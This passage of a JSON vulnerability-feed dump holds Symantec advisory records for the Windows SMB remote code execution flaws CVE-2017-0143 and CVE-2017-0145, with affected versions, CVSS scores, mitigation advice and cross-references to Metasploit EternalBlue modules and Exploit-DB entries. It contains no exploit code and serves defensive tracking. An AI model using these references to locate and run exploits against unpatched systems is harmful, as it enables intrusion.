"eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", 
"hash": "b99edf73073813cd4c0252d2eb2a41b1"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "7d544338a938ae7978c04bbbfd191f84"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "74af08e9aed061e2c0200c647772ba4c"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96703", "hash": "98cd715cd7987a52fdc7c0328cfd081f237800ebc4a0aa74fec49e8b02aac56c", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96703", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0143"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": 
"Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition 
Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. 
\n", "enchantments": {"score": {"modified": "2017-03-15T15:17:01", "value": 8.5}}, "hash": "cafd9923742e45a31e28d1be64997bfa0c179ce159f3ad8f05f219ee06a1f196", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96703", "id": "SMNTC-96703", "lastseen": "2017-03-15T15:17:01", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 29}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:01"}, {"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, 
{"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-13T10:05:55", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, 
{"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2018-03-13T10:05:55", "rev": 2, "value": 9.0, "vector": "NONE"}}, "hash": 
"ef0135522a9267c03dd57804d73f9c73b5634f8b1f4b23fa840ef534d397d81f", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "f67bdf2a5913bc747e96ab7c5ecd1edf", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "eab0fc33a60c89e69362e22d3391fa94", "key": "title"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96703", "id": "SMNTC-96703", "immutableFields": [], "lastseen": "2018-03-13T10:05:55", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 382}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-13T10:05:55"}], "viewCount": 474, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 9.0, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows 
server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": 
"dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "f67bdf2a5913bc747e96ab7c5ecd1edf"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "eab0fc33a60c89e69362e22d3391fa94"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96705", "hash": "838dab6b5cfe969753a475cd7ad276b2f569538a21e7471ebb012292c377d9d8", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0145 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
